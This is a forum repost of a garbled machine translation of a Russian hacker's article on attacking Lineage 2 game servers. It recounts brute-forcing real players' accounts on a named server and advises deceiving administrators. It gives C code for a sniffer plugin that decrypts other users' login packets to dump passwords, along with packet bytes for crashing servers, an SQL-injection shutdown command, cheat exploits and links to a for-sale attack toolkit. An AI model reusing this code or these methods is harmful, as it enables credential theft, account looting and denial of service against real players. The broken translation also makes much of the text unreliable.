1.Absence of a limit on quantity in attempts of authorization It enables to infinite search of passwords to this or that account. I shall not describe as well as that, bruteforce it and in Africa bruteforcer . I shall tell only about the personal experience in this area. Test was spent on www.antaras.ru - old, diing out domestic lineage2 C1OFF a server (with additives from C3). Using only that information (well and non-blocking sockets), what I have given above, have been written bruteforce (bruteforce logins and passwords) and the program which tears out the list nickname, playing the given moment on a server with ' http: // antharas.ru/? id=2 '. Has made from random the list of passwords of type 123456789, 0987654321 (on antaras.ru the minimal length of the password of 8 symbols - on all servers differently), the list with nickname, at present gamers playing on a server, has made ~1500 lines. Bruteforce I started from an extraneous server to not scorch the ип. Total, for a night it has been opened the order of 50 accounts. But, unfortunately, a greater half of accounts were or are empty, or with characters of a small level. But other small part... I Shall tell only, that the total loss, put to gamers, has made hardly more 1kkk game money (clothes) or the order 400 $ if to translate in real - though as will bargain. But, to tell the truth, it "has not made", and "would make". I, actually, absolutely have taken nothing from these accounts, and have found little bit other application to all to it;) About it below.

 

 

There are 3 underwater stones in breaking of accounts by this method. First, if we login on a server under the cracked account, and its owner use at present it on the screen has an inscription, that someone breaks:/For this reason bruteforce I have charged for the night, and in general it is better to do it in the morning. But, by my small experience, I can tell, that, whether users do not pay attention to this inscription, whether do not know English, whether not able to change at all the password, but at me problems with such accounts (on which someone played) have not arisen. I mean, nobody has replaced the password from those who me has found out. Secondly, nickname = a login. My program took nickname players who played on a server, but at all their logins. But it too not especially serious a problem in case of such "mass" breaking as even if at the person with anybody NICKNAME and search of passwords to нику NICKNAME will not pass login LOGINNAME necessarily there will be someone with login NICKNAME vainly though we shall crack and not this concrete character. Thirdly, if you have undressed this or that character, it can address to administration and there is a probability, that everyone will return to it. How it to prevent? I did not collide with it, but, having thought logically, I can assume, that: They will return everyone, if gay will prove, that it divide. You can tell in the justification that have bought from it all for real - same is not fixed anywhere - and gay has wanted you to throw. For greater persuasiveness, during the moment "undress" translate from the purse on any another a round sum and make a screenshot. But administrators, in turn, can look in broad gullies and see there thousand attempts to login, accordingly give an account two weeks will be defended after breaking, let broad gullies about attack will sink into oblivion. Also administrators can pay attention on ип from which the victim and its discrepancy usually comes with from what it has been undressed. Here.. Can find the one who use the same provider, or to take advantage of its services independently, or to break one of it боксов, or to try to explain to administrators, that it it is simple so dexterously you has substituted. Programs which realize the described way of breaking Lineage2 of accounts, on the Internet I did not see... For this reason has decided to write and sell the - la2brute.5bb.ru. It is necessary to recognize, that with the beginning of its general use, accounts to break there was all more difficultly and more difficultly. If I, after have written it (somewhere in February of 2006), on the Russian popular servers could break till 30-50 accounts for a night now this figure in 4-5 times is less. And the last, would be desirable to note, that a unique server which has made protection against search, was la2.abyss.ru. Though actually, still on antaras.ru have entered protection - blocking of an account for 5 minutes after 40 erroneous attempts to login. But at that mass search about which I wrote above, this protection is practically useless.

 

 

2. Enciphering packets

 

As I already spoke enciphering of packages above, a key which is used for generation подключей in a login a server, constant. It and is clear, in fact for calculation of all values P and S algorithm of enciphering Blowfish it is necessary to execute 521 times. If to carry out generation of new values at each client, it will devour very many system resources. But the matter is that l2j and does! Though the key and constant, l2j generates connect for each connection! I do not know, how off the version (at me it is not present also it very difficultly to get), but l2j proves, that to present computers it quite under force. And the problem consists that we can sniffer another's sessions and with ease them to decipher, pulling out a login and the password. So in what then sense of enciphering of packages with blowfish.I have written a plug-in for sniffit to the version 0.3.7.beta which catches and deciphers all the packages passing through your computer and containing a login/password to lineage2 to accounts.

Код:

 

====> la2_plugin.plug <====

/*

 

Sniffit 0.3.7.beta LineAge2 c3 plugin

Allows to catch and decode la2 RequestAuthLogin packets *on the fly*

and dump login/passwords.

 

by darkgrey / m00.blackhat.ru

 

~broken

*/

 

#include "/usr/local/include/blowfish.h"

#define KEY_LEN 20

 

BF_KEY bfkey;

 

char key[] = "[;'.]94-31==-&%@!^+]";

 

void init_la2_plugin() {

 

printf("LineAge2 C3 plugin enabled\n\n");

BF_set_key(&bfkey, KEY_LEN, key);

 

}

 

void PL_la2_plugin (struct Plugin_data *PLD) {

int i = 0;

int count = (PLD->PL_info.DATA_len - 2) / 8;

char *ptr = PLD->PL_data;

unsigned char *ls_ip;

 

if(PLD->PL_info.DATA_len == 0x32 && PLD->PL_info.UDP_len == 0) {

ls_ip=(unsigned char *)&(PLD->PL_iphead.destination);

printf("Login Server ip: %u.%u.%u.%u\n",ls_ip[0],ls_ip[1],ls_ip[2],ls_ip[3]);

 

for(i = 0; i < count; i++)

BF_encrypt((BF_LONG *)((short*)ptr+1+i*4), &bfkey, BF_DECRYPT);

 

i = 2; printf("Login: ");

while(PLD->PL_data[i++] != '\x00' || i != 16)

printf("%c",PLD->PL_data);

 

printf("\nPassword: ");

while(PLD->PL_data[i++] != '\x00' || PLD->PL_data != '\x08')

printf("%c",PLD->PL_data);

 

printf("\n");

}

}

/* eof */

 

====> sn_plugins.h <====

#define PLUGIN2_NAME "LineAge2 c3 Plugin"

#define PLUGIN2(x) PL_la2_plugin(x)

#define PLUGIN2_INIT() init_la2_plugin()

#include "la2_plugin.plug"

/* eof */

 

 

 

That it to use, you need to copy both of a file in the catalogue with sniffit. Well and for compilation all is required to you the same library blowfish and corresponding record in a make-file. m00.blackhat.ru/m00-la2sniff.jpg - shows work bruteforce passwords to lineage2 to servers and in parallel started sniffit with the established plug-in on an example www.antaras.ru (217.107.212.212 - IP a login-server).

 

3. The removed definition of the version lineage2 a server

 

Remember I spoke, what the last of 8 bytes in packages a login-server are allocated under checksum? More precisely, from them penultimate 4:> And if suddenly to leave a package without checksum, off the version lineage a server us disconnect. In l2j function which checks checksum returns true or false, but for some reason returned value is not checked. That is, actually l2j does not check checksum. Accordingly, if disconnect, off if is not present l2j.

 

4.Removed "suspension" of a login-server

 

Has been noticed, that some servers answer the packages which are not containing a login/password a package of type 0x03 (which means, that you are successfully authorized). Then start to behave extremely astably. I have checked up it on 10 large C3 servers, half in any way did not answer such package, another answered with a package 0x01 (authorization has not passed), but only www.la2.ru sent 0x03 and for a while stopped to accept entering connections (probably, at them it is established the system of "auto-rise"). For realization of the program which would suspend la2.ru, you need to mix all the above-given generator of packages with the simple tcp-client. The infinite cycle of a message of similar packages will lead to impossibility to come on a game server.

 

5 The cloning

 

Vulnerability about which now will go speech took place to be in C1 versions C2, therefore I shall especially not concentrate attention on it. The essence consist that we, having authorized on a login-server of 1 times under one account, could come on a game-server under the same account in parallel unlimited number of times. Accordingly, it was possible to enter into game under the same character as much as necessary. The second opportunity of cloning has been described in the paragraph about IID and OID. Cloning of subjects through WH, pupils and other I shall not consider, this theme interesting since on normal servers it already for a long time does not work not seems to me.

 

6.Creation of "mutants" and mixture skills

 

Very interesting theme. The first who realized with programm these ideas (in Russian net) was Hint. For the beginning, on how many you know, in lineage exists a little races. The classes are fixed To each of them (the magician and wars). But the class of one race naturally differs from a similar class another race (skills). And at race dwarfs are not present a class of magicians in general. It was the necessary foreword to understand sense of all described below. And now we shall consider inquiry about creation of the character:

Код:

 

0B // type of a package

45 00 6D 00 30 00 30 00 00 00 // nickname the char

04 00 00 00 // race

00 00 00 00 // sex

35 00 00 00 // an initial trade (class)

14 00 00 00 // 6 constant values, I am at a loss to tell, that they mean

27 00 00 00

// 2D 00 00 00

// 1B 00 00 00

// 1D 00 00 00

// 0A 00 00 00

// 00 00 00 00 // type of hair

00 00 00 00 // color of hair

00 00 00 00 // type of the person

 

 

 

This package war with anybody "m00" a male will create the Dwarf.

It has appeared, that the server (even official) does not check conformity races with chosen a class. It allows us to create chars one races with a class absolutely another (I name them mutants =)). Sounds, certainly, interestingly, but actually we have usual char with the stat and skills, but with structures unusual for it. On idea the bug except for the fan cannot give anything to us (the fan light elf who spoile mobs:)), but it has appeared, that from this, at first sight, a uninteresting bug two result more. How much you know, everyone races has the NPC at which quests on a trade undertake and study skills. And so, mutants learn skills a class of one races at NPC another races. For example, I, playing light elf, learned skill dwarf "Spoil" at NPC elf. And here there was a question and who then will give me a trade and what? The matter is that skills are given depending on a trade (In the given context of a “class"), and here quests depending on races. That is, can it will turn out such, that on achievement of 20-th level and being the dwarf-spoiler, you can receive a trade " Elven Knight " (the first trade light elfs). But this information is not confirmed in practice.

 

By the way speaking, small quantity of mutants can learn in general skills. And in general, if to speak about skills in la2 there is one more bug. LA2 official the client does not check conformity of a level char and a level accessible to studying skill. That is, for example, being on 5-th lvl human fighter you can learn mortal blow a maximum level (provided that will suffice SP). It is easily realized at a batch level. Still it would be desirable to add, that on l2j a server any checks in general are absent. That is you can learn even those skills which are accessible only GM .

 

7. Immortality.

 

Here we also have reached the most interesting theme called in common people - god mode. Will agree, on a server where online is more 1000 person, to be immortal - it is a pleasure =) For the beginning when there comes immortality? On this question has been given banal but as it has appeared the exact answer: when charms it is already dead. It would seem delirium but when at the character 0 HP and it is alive, it cannot be killed (well not absolutely it is impossible:) - about it below). But how to make, that at char was absolute 0 HP, it was alive and thus still HP were not restored? For the beginning we shall consider the problem with 0 HP. In la2 there is such bug: if after death to press on " return to the nearest village " and at once to finish process l2.exe, charms will appear in city with absolute 0 HP and even with buffs (if they before were). It is connected that after a RequestRestartPoint-package the client should send package Apearing after which actually the server both restores char HP and cleans buffs. And as the client we close, it to send this packages is not in time.

 

By the way, why I speak all time "absolute" 0? The matter is that on server HP are stored in a variable of type float (that the most interesting, it is sent the client in the form of an integer). That is, if you will gradually reduce HP up to 0 by means of bleed or poison you do not receive absolute 0 and if HP not the zero, means you are alive. Therefore the unique way to receive absolute 0 is to die. Here, to do 0 HP we have learned, now we shall talk how to freeze them on zero.

1) a first step in this direction was creation of the gnome-magician (as it has been described in the previous paragraph). Most likely, in consequence of that gnomes do not have such class as the magician in general, at it are not recycled HP/MP. Accordingly, having done with such gnome the above-mentioned actions, we shall receive the immortal character. This bug пофиксили practically everywhere.

2) the Second way has been opened a little after gnomes-magicians. It has appeared, that at a choice nonexistent races, are created immortal human with any class. And the most interesting, that if in such a way to create a class human mage, all equally will turn out human fighter, but with magic skills. These two ways have very powerful two lacks:

a) the created characters cannot learn skills and receive a trade.

b) as you understand, реген HP does not work in general, according to you will have to run immortal all time.

3) and now, attention, a bug - which to me the same has helped to find all hint.

How much you know, in a ruler there is such piece as overweight. When you are loaded on 65 % +, at you speed of run, attack and regeneration falls. But very few people knows, that if at you of 90 % + besides you cannot move, at you is not recycled HP! But that to sense of what, having appeared after death in city, you will stand on a place immortal? And here to us will help strider! Sowing on it, you can run with its speed that HP all equally is not recycled! But here there is too a small reef - on some servers (reborn.ru - C4) it is impossible to attack being on strider. Here there's nothing to be done, I can advise to use only buff blazing skin/freazing skin.

4) well and last bug with immortality is demon's set. Perhaps the oldest bug on immortality and about it basically everyone know it. It is fastened that at you turns out negative HP and you accordingly besides cannot be killed. All the above described types of immortality unites one serious lack. The character ceases to be immortal as soon as at it somehow will increase HP - in consequence lvlup's or banal heal's. Also it dies from bleed, poison, some vampirisms. Still here the bug with " fake death " was recollected. On some curves java after FD charms as though and remain dead and they cannot be attacked while they will not make restart. Well it so, to a word.

 

8. ' remote DoS' also that it gives

Usually vulnerability of a similar sort especially are not appreciated, as more than simply "jokes" from them anything to receive it is impossible. LA2 constantly keeps a condition of the world (through each N-seconds - this question still precisely is not studied, yes it and not so is important) that after sudden falling to make recoil. That is, being able to predict (or to provoke) falling of a game-server, we receive " authority above recoils ". What does it mean? And what, have killed you? Recoil! You have undressed? Recoil!! At you it has not turned out to grind a belonging? Recoil!!! Besides there are very valuable monsters who have very big resp time (fairy queen timinel - респ 5 hours, for example) and are present at an individual copy. Have killed, have tumbled down a server, the server has risen, моб has again appeared. As a result time респа is reduced from 5 o'clock up to minutes. How to overload a server? For l2j 100 % the working way is crystallization.

Код:

 

72 // RequestCrystallizeItem

00 00 00 00 // OID subject

FF FF FF FF // quantity

 

 

It is substituted in this package real OID a subject and it is sent. On what the server instantly falls. For projects here all is more complex. At enciphering packages wrong key, the server sometimes falls. WHY? If keys do not coincide, the server means at decoding receives absolutely random values (That is that we have ciphered). And to track down just that sequence of values at which the server falls, at me meanwhile it has not turned out.

 

9. integer overflow in a network cursor l2j

 

Well and so that finally to deny opinion that in lineage2 is not present serious bugs, I shall show to you integer overflow in a server l2j in procedure of processing of client packages:

Код:

 

public void run()

{

_log.fine("loginserver thread[C] started");

int lengthHi = 0;

int lengthLo = 0;

int length = 0;

boolean checksumOk = false;

int sessionKey = -1;

String account = null;

String gameServerIp = null;

try

{

InetAddress adr = InetAddress.getByName(_gameServerHost);

gameServerIp = adr.getHostAddress();

Init startPacket = new Init();

_out.write(startPacket.getLength() & 0xff);

_out.write(startPacket.getLength() >> 8 & 0xff);

_out.write(startPacket.getContent());

_out.flush();

do

{

lengthLo = _in.read();

lengthHi = _in.read();

length = lengthHi * 256 + lengthLo;

if(lengthHi < 0)

{

_log.warning("Client terminated the connection.");

break;

}

byte incoming[] = new byte[length];

incoming[0] = (byte)lengthLo;

incoming[1] = (byte)lengthHi;

.................

 

 

 

It certainly not absolutely ' integer overflow ' in classical understanding of this word-combination, but leads it all over again to two-byte overflow (off-by-two overflow), and then to... Similar vulnerability is available in La2 the client and l2walker'. They hang, devouring 100 % of processor time. But their source codes at me are not present, but there is a basis to believe, that there a code a little other. By the way speaking, server L2J simply completely is filled by similar bugs. Many of them are described on cheats forums. 10. SQL-injection Yes, through this bug in forums it has been cracked, probably, even more servers than once by means of a unicode-bug in iis. What my surprise when I have learned was, that it is and in lineage. And it basically and clearly, much that we transfer a la2-server (titles for members of a clan, nickname for ignore, the list of friends and other) at once is added in server sql-base. Accordingly, a simple command:/block ' SHUTDOWN - we can switch off a sql-server. Most of all amazes that the administrators undertaken fixed this bug, first of all filtered asked on a to speak " SHUTDOWN - " and only have then guessed, that restart of a server is the most minimal that it is possible to make using this bug. In more detail on this bug I shall not , as it, perhaps, most serious that in general is in a ruler. I shall tell only, that fixed it it is the extremely curve:)

 

 

11. Enchant

 

to Me, the bug with enchanting costs on the second place on a demand after "dupe". What is the sharpening in general? It is such roll which allows to improve characteristics of this or that belonging then leaves. But to improve it is possible at all indefinitely. After +3 there is a probability of that the belonging will break. And, the above the degree "enchant" things, the is more probability of its breakage (by the way, not the fact, about it below). Just presence here to this variable "probability" has led to occurrence of uncountable set of ways of enchanting. For example, at someone suddenly any miracle had turned out to enchant on +6, when it... Ran! And now this person writes at forums that is new 100 % a way of a point. Also the some people write, that it is better enchant than 1 times at 1-st level, better enchanting the gnome, also that the probability depends on "recommendations", from intelligence (by the way, about INT to me the person has told a man of education), it is better enchant at night, to use soulshots, to beat during this moment mob, to measure time between points and so on and so forth. I, certainly, cannot argue with these statements as I have not tested everything that write at forums, but I know precisely - a way of enchanting many people are ready to pay quite good money for 100 %. Hence, such way on public unfortunately is not present. And whether there is it in general? We Shall try to understand it together. For the beginning, let's disassemble, how at a batch level enchant a belonging: 1-st package is when in game we press the right button on enchanting, that is we activate it.

Код:

 

14 // type of a package (UseItem)

86 a4 13 40 // OID enchant

00 00 00 00 After activation of enchant we choose that subject which we want to enchanting:

58 // type of a package (RequestEnchantItem)

74 a4 13 40 // OID a subject

 

 

All is extremely simple. By the way speaking, alongside with numerous ways of enchanting, there was such theory, that the probability of a point miscalculates on the client and as though we speak a server, the subject has broken or not. And as if simple artmoney 100 % enchant are possible. It not the truth, you just in it were convinced. Really, at a batch level a point looks it is extremely simple.

How it is possible to deceive th

Link to comment
Share on other sites

Here, that the program has displayed:

-----------------------

0 1 1 0 1 1 0 1 1 0 0 0 0 0 0 1 0 1 0 1 1 0 0 1 1 1 0 1 1 1 0 0 0 1 0 0 0 1 0 1

1 0 0 0 0 0 0 1 1 1 1 1 0 1 1 0 1 0 0 1

29/31

Probability of success: 48.33

0 0 0 1 1 0 0 0 0 1 0 1 1 1 0 0 0 1 1 0 1 0 1 0 1 0 0 1 1 1 1 0 1 1 0 1 0 0 0 1

0 1 0 0 1 1 0 1 1 0 1 0 1 1 0 1 1 1 1 1

32/28

Probability of success: 53.33

1 0 1 1 0 1 0 1 1 1 0 1 1 1 0 1 1 0 0 1 1 0 1 1 1 1 0 1 1 1 0 0 0 1 0 0 1 1 0 0

0 1 0 1 1 0 0 1 0 1 0 0 1 0 0 0 0 1 0 0

31/29

Probability of success: 51.67

1 0 0 1 1 1 1 0 0 0 0 0 0 0 1 1 0 0 1 1 1 0 1 0 0 1 0 0 0 1 0 0 0 1 0 1 0 1 1 0

1 0 1 0 0 0 1 0 1 1 0 0 1 0 0 1 0 1 1 1

27/33

Probability of success: 45.00

Probability of success in the whole: 50.00

 

 

 

 

As you can see, those here are traced " types random " about which wrote f4llen that loss 0 both 1 equiprobably and no law here is present. Plus to all at intermediate measurements of probabilities (for everyone 60 numbers), the probability of success deviated 50 % a little, but the general all was equally as much as possible close to the valid probability of loss 0 or 1. Thus, statistics f4llen's that other, as attempt to systematize usual random. Well and last stone aside those who considers, that on probability of enchanting influences even weather behind a window: In L2j there is no generator of random numbers, in it same library randomizer, that has been used above. With that only a difference, that on probability of enchanting the unique number which is exposed by administration influences. Be are assured, in lineage2 off the same. As a result, I wish to tell, that it is not necessary to try to deceive rand (), more likely it will deceive you =) it is necessary to search for bugs in the process of a point, but besides as it has been shown above, it is too simple process to be bugged. And in general, " accidents does not happen, and there are only unknown to us laws " © Someone.

 

 

12. Geodate (circulation through walls).

 

Today the person in %u0430%u0441%u044E was knocked and has started to argue, that l2j nothing differs from off server. In this connection I have decided to add in clause pair words about geodate in l2j and off. Process of movement on the world in la2 is realized interestingly enough. It appears, behind where to go watches both a server and the client in parallel. More precisely, you click in that point where wish to get, whether the client according to a geodate available it looks it is possible to pass there, if yes sends inquiry about a server. That already in conformity with the geodate resolves or returns you in a starting position. It just the phenomenon under the name " Invisible walls ", which, by the way, it is inherent to ours freeshared projects with curve locations also speaks. In l2j there is no geodate, it used to it in addition. What does it mean? And that movement char is watched only by the client on a geodate available it. Therefore, having taken advantage of a boat (in which clear business also is not present geodate), you can go through walls, because neither a server, nor the client (on behalf of a boat) simply do not know about them. This problem by the way not only l2j. On C1Off as a rule C3/C4 locations also without geodate, that is there it is exact also the responsibility for movement it is assigned only to the client. If to assort movement in more detail it is realized by a package " 0x01 MoveBackwardToLocation ". At it is present two sets of coordinates - where we cost and where we wish to get. After that package the server starts us to move to a point desirable by us step by step. And, with each step it does not send us new coordinates! That to the client to learn in what point at present it the package " 0x48 ValidatePosition " is, sent. That is, as a whole, we send a package with coordinates where we wish to get, and then simply periodically we check, roughly speaking, on how many we have promoted. But it so, for the general development, so to say =)

 

 

 

13. Jokes with SocialAction (0x1b)

 

That such SocialAction, I think, to explain it is not necessary. There were, that besides laughter, greetings, victories and other, animation at LVL UP'Ñ is same SocialAction'. And, how much you know, the inquiry about product SocialAction is sent by the client, that is ourselves can make at any moment to itself lvlup =) Only animation, certainly.

Here a format of a SocialAction-package:

 

1b // Type of a package (SocialAction)

0f 00 00 00 // number action' (0f - lvlup) 1

 

6.The bug with Ride (0x6a)

 

Inquiry "Ride" is sent by the client when wishes to get on strider or vivern.

A format:

%u041A%u043E%u0434:

 

6a // the type of a package

00 00 00 00 // 0/1 climb down /climb

00 00 00 00 // number of the pets: 1 - strider, 2 vivern

 

 

When at you it is caused strider and you send inquiry "Ride", actually, %u0441strider disappears (that is leaves game and loses the OID - it that when you from it climb down just speaks, it vanishes), and you sit down not so particularly on the strider, and on a certain standard striders:) it was incorrectly expressed a little, well all right. It has appeared, that on some La2-servers there is no check on that, and whether you caused in general %u0441%u0442%u0440%u0430%u0439%u0434%u0435%u0440%u0430 before on it to sit down. That is all of a sudden, having sent a package:

6a 01 00 00 00 01 00 00 00 you will sit down on strider though did not cause it. And, even if you do not have . In the same way it is possible sits down and on vivern. This bug, also as well as jokes with SocialAction has been found by the person under anybody Maddaemon. Snk to it.

 

15. We logout chars from game

 

This bug I has opened casually, studying(investigating) all of the same mutants. One of thequestion why when at creation char you you specify nonexistent races (the number more 4), is always created charms with structures human's? And, this human cannot learn skills at NPC human's, that is anything except for its(his) structures with people did not unite. And so, it has appeared, that in the form of human'%u0430 such chars perceives _only_ %u04211/C3 clients. %u04214 for such chars a structure simply does not find and takes off with a mistake. That is, as soon as in a visibility range la2 C4 the client gets such charms, it falls. I mean a visibility range not that you see on the screen, and approximately a visibility range of "/target command. So, for example, having put such character near to the lock for a while siege, at attacking there will be no chance since boats to grasp the lock is extremely problematic, and the client to come into game they simply not can. I have tested it for three large domestic %u04214 servers (not l2j), everywhere worked. Such charms, by the way, it is possible to check characters on boats) If has not fallen, the boat means. But it is a way for GM-sadists . http: // m00.void.ru/nuke.rar - video record from one of Russian %u04214 servers. On it is shown, what effect is rendered with such charms on other players.

 

16. The bug with RequestRestartPoint (revival and escape from prison)

 

This bug has been found by our compatriot from a underground www.allcheats.ru under anybody sshd. When you die, you have a window with a choice of a place where as though you to recover. Under usual conditions there only one button: " return to the nearest village ".

After pressing on which game sends a package:

%u041A%u043E%u0434:

 

6d // type of a package (RequestRestartPoint)

00 00 00 00 // the argument which actually speaks a server about where us to return

 

 

the Bug consists that just the client speaks a server where to return %u0447%u0430%u0440%u0430 after death. That is, not the client, and we.

 

LA2 C3/C4 servers support following values of argument (a place of return):

0 - return to town (in city)

1 - hide PK (if you the personal computer, returns in city of the personal computer or in a vicinity of that city where you have killed)

2 - to castle (in the lock)

3 - to siege HQ (to a flag during siege)

4 - fixed, festival (during festival of darkness recovers you on a place).

 

Thus, having sent together " 00 00 00 00 "," 04 00 00 00 " we of charms will quicken on that place where has actually been killed. In this connection a bug, I had an idea on how it is possible to get out of prison of the character. For this purpose the charms, being prison, should be in a clan. This clan enters the name on siege and puts a flag, thus char which in prison should be killed somehow. On antaras.ru, for example, it is not complex, there around of prison aggression mobs, attacking through a wall. Further you simply send "RequestRestartPoint" a package with argument "03 00 00 00" and charms appears (should will appear:)) alive at a flag.

 

 

17. To undress the another's character not knowing neither a login, nor the password - unless it it is real?

 

Yes, unfortunately it is real. I have decided to clean this paragraph from clause, as it very much serious a gap in lineage2 which still to more not few noise. I do not want, that it was on my conscience:) I Shall tell only, that there is an opportunity to enter under random characters (that is we cannot choose the concrete character, it does a server). Meanwhile it has been tested only on a known server www.l2extreme.com, but I am assured, that it works and on others. So be not surprised, if yours %u0447%u0430%u0440%u0430 with the password maby " 6IlZk9qR [!] " Suddenly will undress.

 

18. Result

 

I have described sufficient guantitys in bugs. Unfortunately, by the moment of the publication of clause the majority of them became any more so are actual. That %u0430%u043A%u0442%u0443%u043B%u044C%u043D%u043E now or is at present in development, probably will be laid out later at a forum la2brute.5bb.ru. V. Bugs of new generation it [is cut out] I Can to tell only, that them will use my new ingame boat LA2Monster.

 

 

VI. The Pair words about C4

 

In general C4 all still cannot stability in any way. A certain branching in realization of authorization is more precisely trite. L2J C4 servers began to apply to enciphering autorisation package RSA (however as well as off from NCSoft). And, the pair private/public-keys is generated for each connection. In the first package the server transfers the client a 1024-bit public key which the client _over _ blowfish ciphers a package with a login/password. This way guarantees that anybody from the outside cannot receive a client login and the password. Though if to recollect breaking Rc5-64 disclosing 128-byte a key not seems such empyrean. It would be desirable to note, that generation key-pair in RSA labour-consuming enough employment. At me on generation of pair keys by means of libraries openssl left ~1.5-2 seconds, that for a server with online, say, in 1000 person - inadmissible luxury. Though besides, the login-server on assignment NCSoft should be by other machine rather than a game-server, but as I already wrote above, it is not always carried out at us in Russia. As if to C1Off altered in æ4, RSA in them it is not used. Though work with internal identifiers which are used for authorization on a game-server is changed. Thus both for l2j and for C1Off-C4 the same is used æ4 the client. VII. An epilogue. Certainly, under this clause it is impossible to create RFC on lineage for, I passed naturally, some moments as they were not important or I up to the end did not understand their itself. Anyhow, I consider, that have given you a great lot of food for reflections. If you with something do not agree or know (think, that know:D) that I do not know, write on d4rk@securitylab.ru, or in %u041B%u0421 on www.allcheats.ru on nick "nop". I shall be glad to communicate.

 

VIII. References.

 

http://72.14.203.104/search?q=cache:Dt3Jo9GNJcJ:gamehaqs.com/forums/index.php%3Fshowtopic%3D5041+blowfish+lineage2*hl=ru*gl=ru*ct=clnk*cd=1 - kept in cache google bbs'‡ on which client-server interaction lineage was discussed. By posts, people persistently does not wish to look source codes l2j and tries to find at random a way to be authorized on a server.

http: // forum.ragezone.com/server-help-extra/lin1-server-emulator-incomplete-cant-even-login-26438.html - the Same

http: // allcheats.ru/forums/showthread.php? t=1844 - the same, only our Russian. Unlike american, have far promoted.

http: // cheaters.net.ua/forum/index.php? s=083fef4f61997fc4be2ad3b0a98ba8a2*showtopic=254*pid=2254*st=0 and * entry2254 - clause F4llen'á about fake-Ý¡þá¡Ô and about types random (it was mentioned in this clause in the paragraph about sharpenings).

http: // www.javable.com/columns/crypto/algorythms/01/-excellent section about blowfish. http: // arbuz.uz/z_pihns.html - interesting clause about calculation of number 3.14 proceeding from the theory of probability. So, for expansion of an outlook.

http: // www.securitylab.ru/analytics/216301.php - my previous clause of similar subjects. It more simple due to intuitively-clear report HalfLife, I recommend beginners to begin with it.

http: // la2brute.5bb.ru - the commercial project. http: // m00.void.ru/nuke.rar - video record - the appendix to paragraph 13 (It is thrown out from game chars) http: // la2brute.5bb.ru/viewtopic.php? id=52 - it is shown, how by means of LA2Fun to learn skills any level on %u043F%u0440%u043E%u0434%u0436%u0435%u043A%u0442%u0430%u0445 and to mix prof on l2j.

http: // la2brute.5bb.ru/viewtopic.php? id=53 - it is shown how to create mutants (on an example immortal) on projects by means of LA2Fun.

 

IX. Appendices to clause.

 

The appendix to clause is to the address of: m00.blackhat.ru/la2shit.rar

Contents:

game-serv-encryption.txt - a source code on enciphering of packages by a game-server (spread sauron on allcheats.ru).

grabber.c - an old example of uploading nickname from a site on an example www.antaras.ru. By the way, on antaras.ru already for a long time have entered cookie so this example already on it does not work. This code was mentioned in section about search of passwords.

ID.rar - the list of subjects and corresponding them ID la2brute_1.1.

OLD.rar - the old test version la2brute. It has been written in February-March of this year. Hangs, falls, so consider it PoC'«¼ =) la2reklamer.rar - the program for mass dispatch of messages. Itself download nickname players whom online and within a minute personally writes each of them the private message.

raid.jpg - an example of how it is possible to use immortal mutants =) author Hint

screenshot1.jpg - a sreen of the generator of auth-packages

screenshot2.jpg - a sreen of teamwork of my patch for sniffit and bruteforce passwords to La2 to servers.

shot1. JPG, shot2. JPG, shot3. JPG - sreens of the mutants created by means of la2fun

sniff.exe - %u044D%u0445 from heart I tear off.. sniffer which to intercept and deciphers entering/proceeding la2-traffic. And and a login-server and a game-server. It is adjusted on my network interface so for use to you will have to rummage in a binary code =)

mass.nuke.avi - record of how because of mine char from a server hundreds person fall.

la2-example.c - an example of designing of RequestAuthLogin-package

Sniffit. LA2C3.plug.rar - a plug-in for sniffit which allows to intercept another's RequestAuthLogin-packages and to pull out from them a login/password

l2.crash.ini - the Ciphered file with adjustments for L2C3 the client from which it falls. At successful operation presumes to get full access to a computer on which this l2.ini has been used.

la2fun_1.2.demo.rar - cut down LA2Fun 1.2. Can create mutants, immortal chars, chars without a head, learn skills any levels. And LA2Bute 1.5 (æ3/C4) I have decided to not spread last versions LA2Fun out of respect for those who bought them for money.. Also wished to lay out the linux-version la2brute, but something could not find:\

 

Special thanks h0snp, sshd and hint =) And also greetings Silence/EF;) and to the channel *m00 on irc.blackhat.ru

 

© darkgrey / m00.blackhat.ru

 

 

All credits for translation goes to CAHEK

 

source http://www.clanlq.com/forum/viewtopic.php?p=2209

Link to comment
Share on other sites

  • 2 months later...
  • 5 months later...
  • 5 months later...
Guest
This topic is now closed to further replies.


×
×
  • Create New...